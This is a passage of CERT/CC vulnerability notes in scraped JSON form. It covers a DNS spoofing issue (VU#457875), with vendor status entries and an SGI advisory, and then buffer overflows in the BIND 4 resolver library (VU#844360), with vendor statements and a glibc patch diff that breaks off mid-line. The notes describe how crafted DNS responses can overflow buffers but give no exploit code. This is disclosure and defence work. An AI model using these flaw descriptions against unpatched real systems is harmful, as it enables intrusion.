October 29, 2002 Updated: November 15, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nadns is not vulnerable. It is a stub resolver library, not a full-service resolver, and does not forward queries.\n\nIf the communication between adns and nameserver can be faked up by the attacker, there can be situations where a similar attack might be made to work. These kind of problems are why the adns documentation tells you that you need to make sure that only packets really from your nameserver can arrive at adns with the nameserver's source address and port.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### BSDi Unknown\n\nNotified: October 29, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### BlueCat Networks Unknown\n\nNotified: October 29, 2002 Updated: November 18, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Conectiva Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Cray Inc. Unknown\n\nNotified: October 29, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Data General Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Engarde Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### FreeBSD Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Hewlett-Packard Company Unknown\n\nNotified: October 29, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### IBM Unknown\n\nNotified: October 29, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Lucent Technologies Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### MandrakeSoft Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Men&amp;Mice Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### MontaVista Software Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### NEC Corporation Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Nixu Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Nortel Networks Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### OpenBSD __ Unknown\n\nNotified: October 29, 2002 Updated: November 18, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nOpenBSD uses non-repeating psuedo-random transaction IDs in all aspects of DNS. \n\n\nI am not sure about the other parts yet. \n \nBut this is in a highly hacked BIND4.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Red Hat Inc. Unknown\n\nNotified: October 29, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### SGI __ Unknown\n\nNotified: October 29, 2002 Updated: December 05, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n`-----BEGIN PGP SIGNED MESSAGE----- \n`\n\n`______________________________________________________________________________ \nSGI Security Advisory \n` \n`Title : BIND Name Server DNS Spoofing Vulnerability \nNumber : 20021203-01-A \nDate : December 5, 2002 \nReference: CERT Vulnerability Note VU#457875 \nReference: SGI BUG 874059 \n______________________________________________________________________________ \n` \n`- ----------------------- \n- --- Issue Specifics --- \n- ----------------------- \n` \n`SGI acknowledges the BIND name server vulnerability reported by Vagner \nSacramento in CERT VU# 457875 (``<http://www.kb.cert.org/vuls/id/457875>`` and \n``<http://www.rnp.br/cais/alertas/2002/cais-ALR-19112002a.html>``) and is \ncurrently investigating. No further information is available at this time. \n` \n`For the protection of all our customers, SGI does not disclose, discuss \nor confirm vulnerabilities until a full investigation has occurred and \nany necessary patch(es) or release streams are available for all vulnerable \nand supported Linux and IRIX operating systems. \n` \n`Until SGI has more definitive information to provide, customers are \nencouraged to assume all security vulnerabilities as exploitable and take \nappropriate steps according to local site security policies and requirements. \n` \n`As further information becomes available, additional advisories will be \nissued via the normal SGI security information distribution methods \nincluding the wiretap mailing list. \n` \n \n`- ------------------------ \n- --- Acknowledgments ---- \n- ------------------------ \n` \n`SGI wishes to thank Vagner Sacramento, CERT, and the users of the Internet \nCommunity at large for their assistance in this matter. \n` \n \n`- -------------- \n- --- Links ---- \n- -------------- \n` \n`SGI Security Advisories can be found at: \n``<http://www.sgi.com/support/security/>`` and \n``<ftp://patches.sgi.com/support/free/security/advisories/>`` \n` \n`SGI Security Patches can be found at: \n``<http://www.sgi.com/support/security/>`` and \n``<ftp://patches.sgi.com/support/free/security/patches/>`` \n` \n`SGI patches for IRIX can be found at the following patch servers: \n``<http://support.sgi.com/irix/>`` and ``<ftp://patches.sgi.com/>`` \n` \n`SGI freeware updates for IRIX can be found at: \n``<http://freeware.sgi.com/>`` \n` \n`SGI fixes for SGI open sourced code can be found on: \n``<http://oss.sgi.com/projects/>`` \n` \n`SGI patches and RPMs for Linux can be found at: \n``<http://support.sgi.com/linux/>`` or \n``<http://oss.sgi.com/projects/sgilinux-combined/download/security-fixes/>`` \n` \n`SGI patches for Windows NT or 2000 can be found at: \n``<http://support.sgi.com/nt/>`` \n` \n`IRIX 5.2-6.4 Recommended/Required Patch Sets can be found at: \n``<http://support.sgi.com/irix/>`` and ``<ftp://patches.sgi.com/support/patchset/>`` \n` \n`IRIX 6.5 Maintenance Release Streams can be found at: \n``<http://support.sgi.com/colls/patches/tools/relstream/index.html>`` \n` \n`IRIX 6.5 Software Update CDs can be obtained from: \n``<http://support.sgi.com/irix/swupdates/>`` \n` \n`The primary SGI anonymous FTP site for security advisories and patches is \npatches.sgi.com (216.32.174.211). Security advisories and patches are \nlocated under the URL ``<ftp://patches.sgi.com/support/free/security/>`` \n` \n`For security and patch management reasons, ftp.sgi.com (mirrors \npatches.sgi.com security FTP repository) lags behind and does not do a \nreal-time update. \n` \n \n`- ----------------------------------------- \n- --- SGI Security Information/Contacts --- \n- ----------------------------------------- \n` \n`If there are questions about this document, email can be sent to \nsecurity-info@sgi.com. \n` \n` ------oOo------ \n` \n`SGI provides security information and patches for use by the entire SGI \ncommunity. This information is freely available to any person needing the \ninformation and is available via anonymous FTP and the Web. \n` \n`The primary SGI anonymous FTP site for security advisories and patches is \npatches.sgi.com (216.32.174.211). Security advisories and patches are \nlocated under the URL ``<ftp://patches.sgi.com/support/free/security/>`` \n` \n`The SGI Security Headquarters Web page is accessible at the URL: \n``<http://www.sgi.com/support/security/>`` \n` \n`For issues with the patches on the FTP sites, email can be sent to \nsecurity-info@sgi.com. \n` \n`For assistance obtaining or working with security patches, please \ncontact your SGI support provider. \n` \n` ------oOo------ \n` \n`SGI provides a free security mailing list service called wiretap and \nencourages interested parties to self-subscribe to receive (via email) all \nSGI Security Advisories when they are released. Subscribing to the mailing \nlist can be done via the Web \n(``<http://www.sgi.com/support/security/wiretap.html>``) or by sending email to \nSGI as outlined below. \n` \n`% mail wiretap-request@sgi.com \nsubscribe wiretap <YourEmailAddress such as zedwatch@sgi.com > \nend \n^d \n` \n`In the example above, <YourEmailAddress> is the email address that you wish \nthe mailing list information sent to. The word end must be on a separate \nline to indicate the end of the body of the message. The control-d (^d) is \nused to indicate to the mail program that you are finished composing the \nmail message. \n` \n \n` ------oOo------ \n` \n`SGI provides a comprehensive customer World Wide Web site. This site is \nlocated at ``<http://www.sgi.com/support/security/>`` . \n` \n` ------oOo------ \n` \n`If there are general security questions on SGI systems, email can be sent to \nsecurity-info@sgi.com. \n` \n`For reporting *NEW* SGI security issues, email can be sent to \nsecurity-alert@sgi.com or contact your SGI support provider. A support \ncontract is not required for submitting a security report. \n` \n`______________________________________________________________________________ \nThis information is provided freely to all interested parties \nand may be redistributed provided that it is not altered in any \nway, SGI is appropriately credited and the document retains and \nincludes its valid PGP signature. \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: 2.6.2 \n` \n`iQCVAwUBPe+EALQ4cFApAP75AQEaSQP+OG8GYq1CVDuI+n5Nshn1YOMyiZyLmtId \nQX9hg1H/kooI5jq0MQdx75iU/9yqRhrtRStrAbjh1IU/Phc5gkXKB9SWBOVHBP1k \nIaURN2ok6SPCr6yu+/O/bWBlD9c0GHcws70aMrp3NdggaMEOS4Zs4dnJblvTmN7m \n+DtKIuifJJQ= \n=AKR/ \n-----END PGP SIGNATURE-----`\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Sequent Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### ShadowSupport Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Sony Corporation Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### SuSE Inc. Unknown\n\nNotified: October 29, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Sun Microsystems Inc. Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### The SCO Group (SCO Linux) Unknown\n\nNotified: October 29, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### The SCO Group (SCO UnixWare) Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Threshold Networks Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Unisys Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Wind River Systems Inc. Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Wirex Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\nView all 44 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.dimap.ufrn.br/>\n * <http://www.icir.org/vern/imw-2002/imw2002-papers/198.pdf>\n * <http://razor.bindview.com/publish/papers/tcpseq.html>\n * <http://mathworld.wolfram.com/BirthdayProblem.html>\n * <http://mathworld.wolfram.com/BirthdayAttack.html>\n * <http://www.securityfocus.com/guest/17905>\n * <http://www.rnp.br/cais/alertas/2002/cais-ALR-19112002a.html>\n * <http://www.rnp.br/cais_en/>\n * <http://www.cert.org/advisories/CA-1997-22.html>\n * <http://www.cert.org/advisories/CA-2001-09.html>\n * <http://www.cert.org/archive/pdf/dns.pdf>\n\n### Acknowledgements\n\nThanks to Vagner Sacramento, DIMAp-UFRN. This vulnerability was discovered by Vagner Sacramento during the development of his master thesis in the DIMAp/UFRN (Department of Computer Science and Applied Mathematics / Federal University of Rio Grande do Norte) under the orientation of Prof. Thais Vasconcelos Batista and Prof. Guido Lemos de Souza Filho. CAIS/RNP (the Brazilian Research Network CSIRT) publicly reported the vulnerability after conducting several experiments in order to validate its claims.\n\nThis document was written by Allen Householder &amp; Ian A Finlay.\n\n### Other Information\n\n**CVE IDs:** | [None](<http://web.nvd.nist.gov/vuln/detail/None>) \n---|--- \n**Severity Metric:** | 40.50 \n**Date Public:** | 2002-11-19 \n**Date First Published:** | 2002-11-19 \n**Date Last Updated: ** | 2004-10-18 15:01 UTC \n**Document Revision: ** | 49 \n", "modified": "2004-10-18T15:01:00", "published": "2002-11-19T00:00:00", "id": "VU:457875", "href": "https://www.kb.cert.org/vuls/id/457875", "type": "cert", "title": "Various DNS service implementations generate multiple simultaneous queries for the same resource record", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-18T20:44:29", "bulletinFamily": "info", "cvelist": ["CVE-2002-0029", "CVE-2002-0684", "CVE-2002-1219", "CVE-2002-1220", "CVE-2002-1221"], "description": "### Overview \n\nThe DNS stub resolver library in ISC BIND 4.9.2 through 4.9.10 contains buffer overflows in code that handles responses for network name and address requests. Other resolver libraries derived from BIND 4 such as BSD libc, GNU glibc, and those used by System V UNIX systems may also be affected. An attacker could execute arbitrary code with the privileges of the application that made the request or cause a denial of service.\n\n### Description \n\nA DNS stub resolver library provides an interface for network applications to make requests and receive responses from the domain name system. The BIND 4 resolver library (`libresolv.a`) contains several buffer overflows in the functions that handle responses for network name and address requests (`getnetbyname()`, `getnetbyaddr()`). While reading the answer portion of a DNS response, the functions copy data received from the network into inadequately sized buffers. A specially crafted DNS response could overflow the buffers, possibly injecting arbitrary code onto the stack.\n\nISC BIND 4.9.2 through 4.9.10 are vulnerable. DNS stub resolver libraries that are derived from BIND 4 may vulnerable, including BSD libc, GNU glibc, and resolvers used by System V UNIX systems. In addition, some network applications provide their own resolver functions which may use vulnerable code from BIND 4. \n \nThe buffer overflows described in this document are different than the network lookup vulnerability described in [CA-2002-19](<http://www.cert.org/advisories/CA-2002-19.html>)/[VU#542971](<http://www.kb.cert.org/vuls/id/542971>)/[CAN-2002-0684](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0684>). \n \nWhen performing a DNS lookup, applications issue calls to resolver functions, at which point most applications dynamically load the relevant portion of the resolver library. Other applications are statically linked at compile time to include resolver functions. In order to use updated resolver code, dynamically linked process must be restarted, and statically linked binaries must be recompiled. \n \n--- \n \n### Impact \n\nAn attacker could execute arbitrary code with the privileges of the application that made the request or cause a denial of service. The attacker would need to control DNS responses, possibly by spoofing responses or gaining control of a DNS server. \n \n--- \n \n### Solution \n\n \n**Patch or Upgrade** \n \nUpgrade or apply a patch as specified by your vendor. Dynamically linked processes must be restarted and statically linked binaries must be recompiled and in order to use the fixed resolver libraries. \n \n--- \n \n \n**Local Caching DNS Server Not Effective** \n \nA local caching DNS server will not prevent malicious responses from reaching vulnerable stub resolvers. \n \n--- \n \n### Vendor Information\n\n844360\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple Computer Inc. __ Affected\n\nNotified: November 12, 2002 Updated: February 25, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAffected Systems: Mac OS X and Mac OS X Server\n\nMitigating Factors: BIND is not enabled by default on Mac OS X or Mac OS X Server. \n \nApple is working on a software update to address this issue.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee Security Update 2002-11-21:\n\n&lt;<http://www.apple.com/support/security/security_updates.html>&gt;\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### GNU glibc __ Affected\n\nNotified: November 12, 2002 Updated: January 16, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nVersion 2.3.1 of the GNU C Library is vulnerable. Earlier versions are also vulnerable. The following patch has been installed into the CVS sources, and should appear in the next version of the GNU C Library. This patch is also available from the following URL:\n\n&lt;[http://sources.redhat.com/cgi-bin/cvsweb.cgi/libc/resolv/nss_dns/dns-network.c.diff?r1=1.17&amp;r2=1.15&amp;cvsroot=glibc](<http://sources.redhat.com/cgi-bin/cvsweb.cgi/libc/resolv/nss_dns/dns-network.c.diff?r1=1.17&r2=1.15&cvsroot=glibc>)&gt; \n \n`2002-11-18 Roland McGrath <roland@redhat.com>` \n \n` * resolv/nss_dns/dns-network.c (getanswer_r): In BYNAME case, search` \n` all aliases for one that matches the \"<dotted-quad>.IN-ADDR.ARPA\" form.` \n` Do the parsing inline instead of copying strings and calling` \n` inet_network, and properly skip all alias names not matching the form.` \n \n`2002-11-14 Paul Eggert <eggert@twinsun.com>` \n \n` * resolv/nss_dns/dns-network.c (getanswer_r): Check for buffer` \n` overflow when skipping the question part and when unpacking aliases.` \n \n`===================================================================` \n`RCS file: /cvs/glibc/libc/resolv/nss_dns/dns-network.c,v` \n`retrieving revision 1.15` \n`retrieving revision 1.17` \n`diff -u -r1.15 -r1.17` \n`--- libc/resolv/nss_dns/dns-network.c 2002/10/17 21:49:12 1.15` \n`+++ libc/resolv/nss_dns/dns-network.c 2002/11/19 06:40:16 1.17` \n`@@ -283,7 +283,15 @@` \n \n` /* Skip the question part. */` \n` while (question_count-- > 0)` \n`- cp += __dn_skipname (cp, end_of_message) + QFIXEDSZ;` \n`+ {` \n`+ int n = __dn_skipname (cp, end_of_message);` \n`+ if (n < 0 || end_of_message - (cp + n) < QFIXEDSZ)` \n`+ {` \n`+ __set_h_errno (NO_RECOVERY);` \n`+ return NSS_STATUS_UNAVAIL;` \n`+ }` \n`+ cp += n + QFIXEDSZ;` \n`+ }` \n \n` alias_pointer = result->n_aliases = &net_data->aliases[0];` \n` *alias_pointer = NULL;` \n`@@ -344,64 +352,94 @@` \n` return NSS_STATUS_UNAVAIL;` \n` }` \n` cp += n;` \n`- *alias_pointer++ = bp;` \n`- n = strlen (bp) + 1;` \n`- bp += n;` \n`- linebuflen -= n;` \n`- result->n_addrtype = class == C_IN ? AF_INET : AF_UNSPEC;` \n`- ++have_answer;` \n`+ if (alias_pointer + 2 < &net_data->aliases[MAX_NR_ALIASES])` \n`+ {` \n`+ *alias_pointer++ = bp;` \n`+ n = strlen (bp) + 1;` \n`+ bp += n;` \n`+ linebuflen -= n;` \n`+ result->n_addrtype = class == C_IN ? AF_INET : AF_UNSPEC;` \n`+ ++have_answer;` \n`+ }` \n` }` \n` }` \n \n` if (have_answer)` \n` {` \n`- char *tmp;` \n`- int len;` \n`- char *in, *cp, *rp, *wp;` \n`- int cnt, first_flag;` \n`-` \n` *alias_pointer = NULL;` \n` switch (net_i)` \n` {` \n` case BYADDR:` \n`- result->n_name = result->n_aliases[0];` \n`+ result->n_name = *result->n_aliases++;` \n` result->n_net = 0L;` \n`- break;` \n`- case BYNAME:` \n`- len = strlen (result->n_aliases[0]);` \n`- tmp = (char *) alloca (len + 1);` \n`- tmp[len] = 0;` \n`- wp = &tmp[len - 1];` \n`-` \n`- rp = in = result->n_aliases[0];` \n`- result->n_name = ans;` \n`-` \n`- first_flag = 1;` \n`- for (cnt = 0; cnt < 4; ++cnt)` \n`- {` \n`- char *startp;` \n`+ return NSS_STATUS_SUCCESS;` \n \n`- startp = rp;` \n`- while (*rp != '.')` \n`- ++rp;` \n`- if (rp - startp > 1 || *startp != '0' || !first_flag)` \n`- {` \n`- first_flag = 0;` \n`- if (cnt > 0)` \n`- *wp-- = '.';` \n`- cp = rp;` \n`- while (cp > startp)` \n`- *wp-- = *--cp;` \n`- }` \n`- in = rp + 1;` \n`- }` \n`-` \n`- result->n_net = inet_network (wp);` \n`+ case BYNAME:` \n`+ {` \n`+ char **ap = result->n_aliases++;` \n`+ while (*ap != NULL)` \n`+ {` \n`+ /* Check each alias name for being of the forms:` \n`+ 4.3.2.1.in-addr.arpa = net 1.2.3.4` \n`+ 3.2.1.in-addr.arpa = net 0.1.2.3` \n`+ 2.1.in-addr.arpa = net 0.0.1.2` \n`+ 1.in-addr.arpa = net 0.0.0.1` \n`+ */` \n`+ uint32_t val = 0; /* Accumulator for n_net value. */` \n`+ unsigned int shift = 0; /* Which part we are parsing now. */` \n`+ const char *p = *ap; /* Consuming the string. */` \n`+ do` \n`+ {` \n`+ /* Match the leading 0 or 0[xX] base indicator. */` \n`+ unsigned int base = 10;` \n`+ if (*p == '0' && p[1] != '.')` \n`+ {` \n`+ base = 8;` \n`+ ++p;` \n`+ if (*p == 'x' || *p == 'X')` \n`+ {` \n`+ base = 16;` \n`+ ++p;` \n`+ if (*p == '.')` \n`+ break; /* No digit here. Give up on alias. */` \n`+ }` \n`+ if (*p == '\\0')` \n`+ break;` \n`+ }` \n`+` \n`+ uint32_t part = 0; /* Accumulates this part's number. */` \n`+ do` \n`+ {` \n`+ if (isdigit (*p) && (*p - '0' < base))` \n`+ part = (part * base) + (*p - '0');` \n`+ else if (base == 16 && isxdigit (*p))` \n`+ part = (part << 4) + 10 + (tolower (*p) - 'a');` \n`+ ++p;` \n`+ } while (*p != '\\0' && *p != '.');` \n`+` \n`+ if (*p != '.')` \n`+ break; /* Bad form. Give up on this name. */` \n`+` \n`+ /* Install this as the next more significant byte. */` \n`+ val |= part 